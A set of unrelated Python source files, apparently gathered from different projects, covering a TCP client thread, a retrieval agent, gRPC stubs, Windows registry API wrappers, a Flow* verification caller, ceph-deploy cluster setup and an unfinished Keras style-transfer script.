LOG.info("[TERMINATE] Finish server with handler %s" % str(self.handler))
class CommonClient(threading.Thread):
"""
A basic TCP client that connects to the server at @server_address.
A real client can extend this class by implementing interesting stuff in
_handle_input_data, which is triggered by input transmission, or
_handle_queue_data, which is triggered by putting anything in self.data_queue
"""
def __init__(self, server_address):
self.server_address = server_address
# set up socket connection to the server
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.sock.connect(server_address)
self.stop_queue = multiprocessing.Queue()
threading.Thread.__init__(self, target = self.run)
def _recv_all(self, recv_size):
'''
Received data till a specified size.
'''
data = ''
while len(data) < recv_size:
tmp_data = self.sock.recv(recv_size - len(data))
if tmp_data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(tmp_data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
data += tmp_data
return data
def run(self):
try:
## input list
# 1) react whenever there's input data from client
# 2) (optional) a data queue may trigger some processing
# 3) a stop queue to notify termination
socket_fd = self.sock.fileno()
stop_fd = self.stop_queue._reader.fileno()
input_list = [socket_fd, stop_fd]
data_queue_fd = -1
if hasattr(self, 'data_queue'):
data_queue_fd = self.data_queue._reader.fileno()
input_list += [data_queue_fd]
## except list
except_list = [socket_fd, stop_fd]
is_running = True
while is_running:
inputready, outputready, exceptready = \
select.select(input_list, [], except_list)
for s in inputready:
if s == socket_fd:
self._handle_input_data()
if s == stop_fd:
is_running = False
# For output, check queue first. If we check output socket,
# select may return immediately (in case when nothing is sent out)
if s == data_queue_fd:
self._handle_queue_data()
for e in exceptready:
is_running = False
except TCPZeroBytesError as e:
LOG.info("Connection to (%s) closed: %s\n" % (self.server_address, str(e)))
except Exception as e:
LOG.warning("Connection to (%s) closed not gracefully: %s\n" % (self.server_address, str(e)))
LOG.warning(traceback.format_exc())
if self.sock is not None:
self.sock.close()
self.sock = None
LOG.info("[TERMINATE] Finish %s" % str(self))
def _handle_input_data(self):
"""
By default, no input is expected.
But blocked read will return 0 if the other side closes gracefully
"""
data = self.sock.recv(1)
if data is None:
raise TCPNetworkError("Cannot recv data at %s" % str(self))
if len(data) == 0:
raise TCPZeroBytesError("Recv 0 bytes.")
else:
LOG.error("unexpected network input in %s" % str(self))
self.terminate()
def _handle_queue_data(self):
pass
def terminate(self):
self.stop_queue.put("terminate\n")
|
from header import *
from model import *
from config import *
from dataloader import *
from inference import Searcher
from es.es_utils import *
from .utils import *
def init_recall(args):
if args['model'] == 'bm25':
# Elasticsearch
searcher = ESSearcher(f'{args["dataset"]}_q-q', q_q=True)
# searcher = ESSearcher(f'{args["dataset"]}_q-r', q_q=False)
agent = None
size = searcher.get_size()
elif args['model'] == 'full':
searcher = [a for _, a in load_qa_pair(f'{args["root_dir"]}/data/{args["dataset"]}/train.txt')]
agent = None
print(f'[!] load {len(searcher)} samples for full-rerank mode')
size = len(searcher)
else:
searcher = Searcher(args['index_type'], dimension=args['dimension'], with_source=args['with_source'], nprobe=args['index_nprobe'])
model_name = args['model']
ipdb.set_trace()
pretrained_model_name = args['pretrained_model'].replace('/', '_')
if args['with_source']:
path_source_corpus = f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_source_corpus.ckpt'
else:
path_source_corpus = None
searcher.load(
f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_faiss.ckpt',
f'{args["root_dir"]}/data/{args["dataset"]}/{model_name}_{pretrained_model_name}_corpus.ckpt',
path_source_corpus=path_source_corpus
)
searcher.move_to_gpu(device=0)
print(f'[!] load faiss over')
agent = load_model(args)
pretrained_model_name = args['pretrained_model'].replace('/', '_')
if args['with_source']:
save_path = f'{args["root_dir"]}/ckpt/writer/{args["model"]}/best_{pretrained_model_name}.pt'
else:
save_path = f'{args["root_dir"]}/ckpt/{args["dataset"]}/{args["model"]}/best_{pretrained_model_name}.pt'
agent.load_model(save_path)
print(f'[!] load model over')
size = searcher.searcher.ntotal
return searcher, agent, size
class RecallAgent:
def __init__(self, args):
self.searcher, self.agent, self.whole_size = init_recall(args)
self.args = args
@timethis
def work(self, batch, topk=None):
'''batch: a list of string (query)'''
batch = [i['str'] for i in batch]
topk = topk if topk else self.args['topk']
if self.args['model'] == 'bm25':
batch = [' '.join(i) for i in batch]
rest_ = self.searcher.msearch(batch, topk=topk)
elif self.args['model'] == 'full':
rest_ = [self.searcher]
else:
vectors = self.agent.encode_queries(batch) # [B, E]
rest_ = self.searcher._search(vectors, topk=topk)
rest = []
for item in rest_:
cache = []
for i in item:
if type(i) == str:
# with_source is False
assert self.args['with_source'] is False
cache.append({
'text': i,
'source': {'title': None, 'url': None},
})
elif type(i) == tuple:
# with_source is True
assert self.args['with_source'] is True
cache.append({
'text': i[0],
'source': {
'title': i[1],
'url': i[2],
}
})
else:
raise Exception()
rest.append(cache)
return rest
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import campaign_budget_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2
from google.ads.google_ads.v2.proto.services import campaign_budget_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2
class CampaignBudgetServiceStub(object):
"""Proto file describing the Campaign Budget service.
Service to manage campaign budgets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignBudget = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignBudgetService/GetCampaignBudget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.GetCampaignBudgetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2.CampaignBudget.FromString,
)
self.MutateCampaignBudgets = channel.unary_unary(
'/google.ads.googleads.v2.services.CampaignBudgetService/MutateCampaignBudgets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsResponse.FromString,
)
class CampaignBudgetServiceServicer(object):
"""Proto file describing the Campaign Budget service.
Service to manage campaign budgets.
"""
def GetCampaignBudget(self, request, context):
"""Returns the requested Campaign Budget in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignBudgets(self, request, context):
"""Creates, updates, or removes campaign budgets. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignBudgetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignBudget': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignBudget,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.GetCampaignBudgetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_campaign__budget__pb2.CampaignBudget.SerializeToString,
),
'MutateCampaignBudgets': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignBudgets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_campaign__budget__service__pb2.MutateCampaignBudgetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.CampaignBudgetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
nota1 = float(input('Primeira nota: '))
nota2 = float(input('Segunda nota: '))
media = (nota1 + nota2) / 2
print(f'Tirando {nota1:.1f} e {nota2:.1f}, a média do aluno é {media:.1f}')
if media >= 7.0:
print('O aluno esta APROVADO!')
elif media >= 5.0 and media < 7:
print('O aluno está em RECUPERAÇÃO!')
elif media < 5.0:
print('O aluno está REPROVADO!')
|
class Dog:
def __init__(self, name='chuchu',id=0):
self.name = name
self.id=id
def set_producer(self, producer):
self.producer = producer
|
import os
import sys
import base64
from django.db.models import F, Q
from xos.config import Config
from observer.syncstep import SyncStep
from core.models import Service
from hpc.models import ServiceProvider
from util.logger import Logger, logging
# hpclibrary will be in steps/..
parentdir = os.path.join(os.path.dirname(__file__),"..")
sys.path.insert(0,parentdir)
from hpclib import HpcLibrary
logger = Logger(level=logging.INFO)
class SyncServiceProvider(SyncStep, HpcLibrary):
provides=[ServiceProvider]
requested_interval=0
def __init__(self, **args):
SyncStep.__init__(self, **args)
HpcLibrary.__init__(self)
def fetch_pending(self, deleted):
#self.consistency_check()
return SyncStep.fetch_pending(self, deleted)
def consistency_check(self):
# set to true if something changed
result=False
# sanity check to make sure our PS objects have CMI objects behind them
all_sp_ids = [x["service_provider_id"] for x in self.client.onev.ListAll("ServiceProvider")]
for sp in ServiceProvider.objects.all():
if (sp.service_provider_id is not None) and (sp.service_provider_id not in all_sp_ids):
logger.info("Service provider %s was not found on CMI" % sp.service_provider_id)
sp.service_provider_id=None
sp.save()
result = True
return result
def sync_record(self, sp):
logger.info("sync'ing service provider %s" % str(sp))
account_name = self.make_account_name(sp.name)
sp_dict = {"account": account_name, "name": sp.name, "enabled": sp.enabled}
if not sp.service_provider_id:
id = self.client.onev.Create("ServiceProvider", sp_dict)
sp.service_provider_id = id
else:
self.client.onev.Update("ServiceProvider", sp.service_provider_id, sp_dict)
sp.save()
def delete_record(self, m):
if m.service_provider_id is not None:
self.client.onev.Delete("ServiceProvider", m.service_provider_id)
|
# Copyright (c) 2021.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from multiprocessing import Queue
STARTED = False
HOST = os.getenv("PY_HEALTH_CHECK_HOST", "0.0.0.0")
PORT = os.getenv("PY_HEALTH_CHECK_PORT", "8080")
TEST_MODE = os.getenv("PY_HEALTH_TEST_MODE", None) is not None
if isinstance(PORT, str) and PORT.isdecimal() and 1 < int(PORT) < 65535:
PORT = int(PORT)
else:
PORT = 8080
if not TEST_MODE:
message_queue = Queue()
process_queue = Queue()
status_queue = Queue()
|
# -*- coding: utf-8 -*-
import logging
from skimage.util.shape import view_as_windows
import numpy as np
import pandas as pd
__author__ = "Jannik Frauendorf"
__copyright__ = "Jannik Frauendorf"
__license__ = "mit"
_logger = logging.getLogger(__name__)
def create_sliding_windows(series, window_size):
"""
Computes the result of a sliding window over the given vector with the given window size.
Each row represents the content of the sliding window at each position.
:param series: pandas Series containing the time series
:param window_size: an integer specifying the width of the sliding window.
:return: pandas DataFrame
"""
vector = np.array(series)
return pd.DataFrame(view_as_windows(vector, window_size))
def normalize_column(df, column_name, new_column_name=None):
"""
Normalize the given column in the given DatFrame linearly between 0 and 1.
If no new_column_name is given the original data will be replaced.
:param df: a pandas data frame that contains at least the given column_name
:param column_name: a string that specifies the column name that should be normalized
:param new_column_name: a string that specifies the column name of the normalized values
:return: pandas DataFrame
"""
if new_column_name is None:
new_column_name = column_name
column_min = df[column_name].min()
column_max = df[column_name].max()
# linear normalization
df.loc[:, new_column_name] = (df[column_name] - column_min) / (column_max - column_min)
return df
|
from .constants import MAX_KEYNAME_LENGTH, MAX_VALUENAME_LENGTH
from .dtypes import create_unicode_buffer
from .dtypes import BYTE, LPVOID, DWORD, LONG, LPCWSTR, HKEY, LPWSTR, POINTER
from .dtypes import SECURITY_ATTRIBUTES, FILETIME
from .funcs import wrap_advapi32_function
class WrappedFunction(object):
_return_value = LONG
_parameters = ()
@classmethod
def __new__(cls, *args, **kwargs):
function = cls._get_function()
return_value = function(*args[1:], **kwargs)
return return_value
@classmethod
def _get_function(cls):
name = cls.__name__
return_value = cls._return_value
parameters = cls._get_parameters()
function = wrap_advapi32_function(name, return_value, parameters)
return function
@classmethod
def is_available_on_this_platform(cls):
try:
function = cls._get_function()
return True
except AttributeError:
return False
return True # pragma: no cover
class RegCloseKey(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',),
class RegConnectRegistryW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (LPCWSTR, 1, 'computerName', None), \
(HKEY, 1, 'key',), \
(POINTER(HKEY), 2, 'result',),
class RegCreateKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, 'subKey',), \
(DWORD, 1, 'reserved',), (LPCWSTR, 1, 'classType',), \
(DWORD, 1, 'options',), (DWORD, 1, 'samDesired',), \
(POINTER(SECURITY_ATTRIBUTES), 1, 'securityAttributes',), \
(POINTER(HKEY), 2, 'result',), \
(POINTER(DWORD), 2, 'disposition',),
class RegDeleteKeyW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPWSTR, 1, 'subKey',),
class RegDeleteValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, "valueName"),
class RegEnumKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (DWORD, 1, "index"), \
(LPWSTR, 2, 'name', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'nameSize', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(LPWSTR, 3, 'classType', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'classTypeSize', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(FILETIME), 3, 'lastWriteTime', FILETIME())
class RegEnumValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(DWORD, 1, 'index',), \
(LPWSTR, 2, 'name', create_unicode_buffer(MAX_VALUENAME_LENGTH)), \
(POINTER(DWORD), 3, 'nameLength', DWORD(MAX_VALUENAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD())
class RegFlushKey(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',),
class RegGetValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), (LPCWSTR, 1, 'subKey',), \
(LPCWSTR, 1, 'valueName',), (DWORD, 1, 'flags', 0), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD()),
class RegOpenKeyExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'subKey',), \
(DWORD, 1, 'options', 0), (DWORD, 1, 'samDesired', 0), \
(POINTER(HKEY), 2, 'result')
class RegQueryInfoKeyW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPWSTR, 2, 'classType', create_unicode_buffer(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 3, 'classTypeLength', DWORD(MAX_KEYNAME_LENGTH)), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'subKeys',), \
(POINTER(DWORD), 2, 'maxSubKeyLength',), \
(POINTER(DWORD), 2, 'maxClassTypeLength',), \
(POINTER(DWORD), 2, 'values',), \
(POINTER(DWORD), 2, 'maxValueNameLength'), \
(POINTER(DWORD), 2, 'maxValueLength',), \
(POINTER(DWORD), 2, 'securityDescriptor'), \
(POINTER(DWORD), 2, 'lastWriteTime')
class RegQueryValueExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'name',), \
(POINTER(DWORD), 0, 'reserved', None), \
(POINTER(DWORD), 2, 'dataType', DWORD()), \
(POINTER(BYTE), 3, 'data', (BYTE * 0).from_address(0)), \
(POINTER(DWORD), 3, 'dataLength', DWORD())
class RegSetKeyValueW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'subKey,',), \
(LPCWSTR, 1, 'valueName',), \
(DWORD, 1, 'dataType',), \
(POINTER(BYTE), 1, 'data',), \
(DWORD, 1, 'dataLength',)
class RegSetValueExW(WrappedFunction):
@classmethod
def _get_parameters(cls):
return (HKEY, 1, 'key',), \
(LPCWSTR, 1, 'name',), \
(POINTER(DWORD), 0, 'reserved', None), \
(DWORD, 1, 'dataType',), \
(POINTER(BYTE), 1, 'data',), \
(DWORD, 1, 'dataLength',)
|
import collections
import os, os.path
import subprocess
import logging
import sys
sym_dict = collections.OrderedDict({"Add":"+","Mul":"*","Pow":"^",
"StrictGreaterThan":">","GreaterThan":">=",
"StrictLessThan":"<","LessThan":"<=",
"And":"and", "Or":"or","Not":"not", "exp":"exp", "sin":"sin", "cos":"cos", "Abs":"abs"})
num_dict =["Float","Integer","Zero","One","Symbol","NegativeOne"]
def sympy2matlab(symbolic_expression):
string = str(symbolic_expression)
string = string.replace("**","^")
return string
def goal_set2str(symbolic_expression):
text = ""
for expr in symbolic_expression.args:
text = text + sympy2matlab(expr) + "\n"
return text
def write_model_file(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box, remainder, file_path,file_name="file.model"):
""" Create a model file for reachability analysis."""
#Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
#Fix parameters of flowstar
text = "continuous reachability\n" + "{\n" + "state var "
for var in symbol_list:
text = text + str(var) + ", "
text = text + "tau\n\n" + "setting\n" + "{\n" + "adaptive steps { min 0.000000001, max 0.1}\n" +\
"time " + str(time_max) + "\nremainder estimation " + str(remainder) + "\nidentity precondition\n" + "gnuplot octagon " +\
str(symbol_list[0]) + ", " + str(symbol_list[1]) + "\n" + "fixed orders 4\n" + "cutoff 1e-20\n" +\
"precision 256\n" + "output reach\n" + "print off\n}\n\n"
#Define dynamics of the system
text = text + "poly ode 2\n{\n"
i=0
for var in symbol_list:
text = text + str(var) + "' = " + sympy2matlab(dynamics[i]) + "\n"
i = i+1
text = text + "tau' = 1\n}\n\n"
i=0
for par in parameter_list:
text = text.replace(str(par), str(parameter_box[i]))
i = i+1
#Define initial set
text = text + "init\n{\n"
i=0
for var in symbol_list:
text = text + str(var) + " in " + str(init_box[i]) + "\n"
i = i+1
text = text + "tau in [0,0]\n}\n}\n\n"
#Define goal set
text = text + "unsafe set\n{\n"
text = text + goal_set2str(goal_symbolic) + "}"
with open(os.path.join(file_path,file_name),'w+') as f:
f.write(text)
logging.info("Model File exported at " + os.path.join(file_path,file_name))
return
def call_flowstar(flowstar_path,file_path,file_name ="file.model", time_out = None):
# Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
#Initialize results
result ={}
logging.info("Calling flowstar")
result['time-out']= False
try:
word = flowstar_path + ' < ' + os.path.relpath(file_path) + '/'+file_name
# print(word)
if (time_out == None):
output_flowstar = subprocess.check_output([word],shell=True).decode("utf-8")
else:
output_flowstar = subprocess.check_output([word],shell=True,timeout=time_out).decode("utf-8")
except KeyboardInterrupt:
# Make sure the processes are killed when keyboardinterrupt
subprocess.run(["pkill", "-f", "flowstar"])
subprocess.run(["pkill","-f","flowstar"])
subprocess.run(["pkill","-f","flowstar"])
subprocess.run(["pkill","-f","flowstar"])
sys.exit()
except Exception:
output_flowstar = 'time-out'
result['time-out']= True
logging.info("flowstar time-out or other unexpected result.")
if output_flowstar == 'time-out':
result['sat'] = True
if ('SAFE' in output_flowstar):
result['sat']= False
result['time-out'] = False
else:
result['sat'] = True
if ('is not large enough' in output_flowstar):
result['time-out']= True
result['sat'] = True
logging.info("flowstar remainder is not large enough. Terminate the program and enlarge the remainder.")
return result
def flowstar_verify(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box,\
flowstar_path,file_path,file_name ="file.model", time_out = None, remainder = 1e-1):
# Check file suffix
if not file_name.endswith('.model'):
file_name = file_name + '.model'
write_model_file(init_box, goal_symbolic, time_max, symbol_list, dynamics, parameter_list, parameter_box, remainder, file_path,file_name)
result = call_flowstar(flowstar_path,file_path,file_name, time_out)
for fname in os.listdir(file_path):
if fname.startswith(os.path.splitext(file_name)):
os.remove(os.path.join(file_path, fname))
return result
|
# Generated by Django 3.0.8 on 2020-08-19 11:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rest', '0033_auto_20200819_2058'),
]
operations = [
migrations.AlterField(
model_name='culture_event',
name='name',
field=models.CharField(max_length=60, primary_key=True, serialize=False),
),
]
|
import errno
import logging
import os
import uuid
import struct
import time
import base64
import socket
from ceph_deploy.cliutil import priority
from ceph_deploy import conf, hosts, exc
from ceph_deploy.util import arg_validators, ssh, net
from ceph_deploy.misc import mon_hosts
from ceph_deploy.lib import remoto
from ceph_deploy.connection import get_local_connection
LOG = logging.getLogger(__name__)
def generate_auth_key():
key = os.urandom(16)
header = struct.pack(
'<hiih',
1, # le16 type: CEPH_CRYPTO_AES
int(time.time()), # le32 created: seconds
0, # le32 created: nanoseconds,
len(key), # le16: len(key)
)
return base64.b64encode(header + key)
def ssh_copy_keys(hostname, username=None):
LOG.info('making sure passwordless SSH succeeds')
if ssh.can_connect_passwordless(hostname):
return
LOG.warning('could not connect via SSH')
# Create the key if it doesn't exist:
id_rsa_pub_file = os.path.expanduser(u'~/.ssh/id_rsa.pub')
id_rsa_file = id_rsa_pub_file.split('.pub')[0]
if not os.path.exists(id_rsa_file):
LOG.info('creating a passwordless id_rsa.pub key file')
with get_local_connection(LOG) as conn:
remoto.process.run(
conn,
[
'ssh-keygen',
'-t',
'rsa',
'-N',
"",
'-f',
id_rsa_file,
]
)
# Get the contents of id_rsa.pub and push it to the host
LOG.info('will connect again with password prompt')
distro = hosts.get(hostname, username, detect_sudo=False)
auth_keys_path = '.ssh/authorized_keys'
if not distro.conn.remote_module.path_exists(auth_keys_path):
distro.conn.logger.warning(
'.ssh/authorized_keys does not exist, will skip adding keys'
)
else:
LOG.info('adding public keys to authorized_keys')
with open(os.path.expanduser('~/.ssh/id_rsa.pub'), 'r') as id_rsa:
contents = id_rsa.read()
distro.conn.remote_module.append_to_file(
auth_keys_path,
contents
)
distro.conn.exit()
def validate_host_ip(ips, subnets):
"""
Make sure that a given host all subnets specified will have at least one IP
in that range.
"""
# Make sure we prune ``None`` arguments
subnets = [s for s in subnets if s is not None]
validate_one_subnet = len(subnets) == 1
def ip_in_one_subnet(ips, subnet):
""" ensure an ip exists in at least one subnet """
for ip in ips:
if net.ip_in_subnet(ip, subnet):
return True
return False
for subnet in subnets:
if ip_in_one_subnet(ips, subnet):
if validate_one_subnet:
return
else: # keep going to make sure the other subnets are ok
continue
else:
msg = "subnet (%s) is not valid for any of the ips found %s" % (subnet, str(ips))
raise RuntimeError(msg)
def get_public_network_ip(ips, public_subnet):
"""
Given a public subnet, chose the one IP from the remote host that exists
within the subnet range.
"""
for ip in ips:
if net.ip_in_subnet(ip, public_subnet):
return ip
msg = "IPs (%s) are not valid for any of subnet specified %s" % (str(ips), str(public_subnet))
raise RuntimeError(msg)
def new(args):
if args.ceph_conf:
raise RuntimeError('will not create a Ceph conf file if attemtping to re-use with `--ceph-conf` flag')
LOG.debug('Creating new cluster named %s', args.cluster)
cfg = conf.ceph.CephConf()
cfg.add_section('global')
fsid = args.fsid or uuid.uuid4()
cfg.set('global', 'fsid', str(fsid))
# if networks were passed in, lets set them in the
# global section
if args.public_network:
cfg.set('global', 'public network', str(args.public_network))
if args.cluster_network:
cfg.set('global', 'cluster network', str(args.cluster_network))
mon_initial_members = []
mon_host = []
for (name, host) in mon_hosts(args.mon):
# Try to ensure we can ssh in properly before anything else
if args.ssh_copykey:
ssh_copy_keys(host, args.username)
# Now get the non-local IPs from the remote node
distro = hosts.get(host, username=args.username)
remote_ips = net.ip_addresses(distro.conn)
# custom cluster names on sysvinit hosts won't work
if distro.init == 'sysvinit' and args.cluster != 'ceph':
LOG.error('custom cluster names are not supported on sysvinit hosts')
raise exc.ClusterNameError(
'host %s does not support custom cluster names' % host
)
distro.conn.exit()
# Validate subnets if we received any
if args.public_network or args.cluster_network:
validate_host_ip(remote_ips, [args.public_network, args.cluster_network])
# Pick the IP that matches the public cluster (if we were told to do
# so) otherwise pick the first, non-local IP
LOG.debug('Resolving host %s', host)
if args.public_network:
ip = get_public_network_ip(remote_ips, args.public_network)
else:
ip = net.get_nonlocal_ip(host)
LOG.debug('Monitor %s at %s', name, ip)
mon_initial_members.append(name)
try:
socket.inet_pton(socket.AF_INET6, ip)
mon_host.append("[" + ip + "]")
LOG.info('Monitors are IPv6, binding Messenger traffic on IPv6')
cfg.set('global', 'ms bind ipv6', 'true')
except socket.error:
mon_host.append(ip)
LOG.debug('Monitor initial members are %s', mon_initial_members)
LOG.debug('Monitor addrs are %s', mon_host)
cfg.set('global', 'mon initial members', ', '.join(mon_initial_members))
# no spaces here, see http://tracker.newdream.net/issues/3145
cfg.set('global', 'mon host', ','.join(mon_host))
# override undesirable defaults, needed until bobtail
# http://tracker.ceph.com/issues/6788
cfg.set('global', 'auth cluster required', 'cephx')
cfg.set('global', 'auth service required', 'cephx')
cfg.set('global', 'auth client required', 'cephx')
# http://tracker.newdream.net/issues/3138
cfg.set('global', 'filestore xattr use omap', 'true')
path = '{name}.conf'.format(
name=args.cluster,
)
new_mon_keyring(args)
LOG.debug('Writing initial config to %s...', path)
tmp = '%s.tmp' % path
with file(tmp, 'w') as f:
cfg.write(f)
try:
os.rename(tmp, path)
except OSError as e:
if e.errno == errno.EEXIST:
raise exc.ClusterExistsError(path)
else:
raise
def new_mon_keyring(args):
LOG.debug('Creating a random mon key...')
mon_keyring = '[mon.]\nkey = %s\ncaps mon = allow *\n' % generate_auth_key()
keypath = '{name}.mon.keyring'.format(
name=args.cluster,
)
oldmask = os.umask(077)
LOG.debug('Writing monitor keyring to %s...', keypath)
try:
tmp = '%s.tmp' % keypath
with open(tmp, 'w', 0600) as f:
f.write(mon_keyring)
try:
os.rename(tmp, keypath)
except OSError as e:
if e.errno == errno.EEXIST:
raise exc.ClusterExistsError(keypath)
else:
raise
finally:
os.umask(oldmask)
@priority(10)
def make(parser):
"""
Start deploying a new cluster, and write a CLUSTER.conf and keyring for it.
"""
parser.add_argument(
'mon',
metavar='MON',
nargs='+',
help='initial monitor hostname, fqdn, or hostname:fqdn pair',
type=arg_validators.Hostname(),
)
parser.add_argument(
'--no-ssh-copykey',
dest='ssh_copykey',
action='store_false',
default=True,
help='do not attempt to copy SSH keys',
)
parser.add_argument(
'--fsid',
dest='fsid',
help='provide an alternate FSID for ceph.conf generation',
)
parser.add_argument(
'--cluster-network',
help='specify the (internal) cluster network',
type=arg_validators.Subnet(),
)
parser.add_argument(
'--public-network',
help='specify the public network for a cluster',
type=arg_validators.Subnet(),
)
parser.set_defaults(
func=new,
)
|
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
import sys
import time
start_time = time.time()
use_keras = True
if use_keras:
use_cntk = False
if use_cntk:
try:
base_directory = os.path.split(sys.executable)[0]
os.environ['PATH'] += ';' + base_directory
import cntk
os.environ['KERAS_BACKEND'] = 'cntk'
except ImportError:
print('CNTK not installed')
else:
os.environ['KERAS_BACKEND'] = 'tensorflow'
import keras
else:
import cntk
import cntk.ops.functions
import numpy as np
import scipy
import matplotlib.pyplot as plt
import time
import datetime
import random
random.seed(2018)
np.random.seed(2018)
def deprocess_image(x):
x[:, :, 0] += 103.939
x[:, :, 1] += 116.779
x[:, :, 2] += 123.68
# 'BGR'->'RGB'
x = x[:, :, ::-1]
x = np.clip(x, 0, 255).astype('uint8')
return x
def preprocess_image(image_path, img_height, img_width):
if use_keras is True:
import keras.preprocessing
import keras.applications
import keras.backend
else:
import keras.backend
keras.backend.set_image_data_format('channels_first')
img = keras.preprocessing.image.load_img(image_path, target_size=(img_height, img_width))
img = keras.preprocessing.image.img_to_array(img)
img = np.expand_dims(img, axis=0)
img = keras.applications.vgg19.preprocess_input(img)
return img
def content_loss(base, combination):
diff_ = combination - base
square_ = keras.backend.square(diff_)
sum_ = keras.backend.sum(square_)
return sum_
def gram_matrix(x):
# print('\n\nx=', keras.backend.int_shape(x))
x_shape = keras.backend.int_shape(x)
channels_first_ = keras.backend.permute_dimensions(x, (2, 0, 1))
features = keras.backend.reshape(channels_first_, (x_shape[2], x_shape[0]*x_shape[1]))
features_transposed = keras.backend.transpose(features)
gram = keras.backend.dot(features, features_transposed)
# import tensorflow as tf
# channels_first_ = keras.backend.permute_dimensions(x, (2, 0, 1))
# features = keras.backend.batch_flatten(channels_first_)
# features = tf.Print(features, ['x=', tf.shape(x), 'channels_first_', tf.shape(channels_first_), 'features=', tf.shape(features)])
# features_transposed = keras.backend.transpose(features)
# gram = keras.backend.dot(features, features_transposed)
return gram
def style_loss(style, combination, img_height, img_width):
style_gram = gram_matrix(style)
combination_gram = gram_matrix(combination)
channels = 3
size = img_height * img_width
scaling_factor = (4. * (channels ** 2) * (size ** 2))
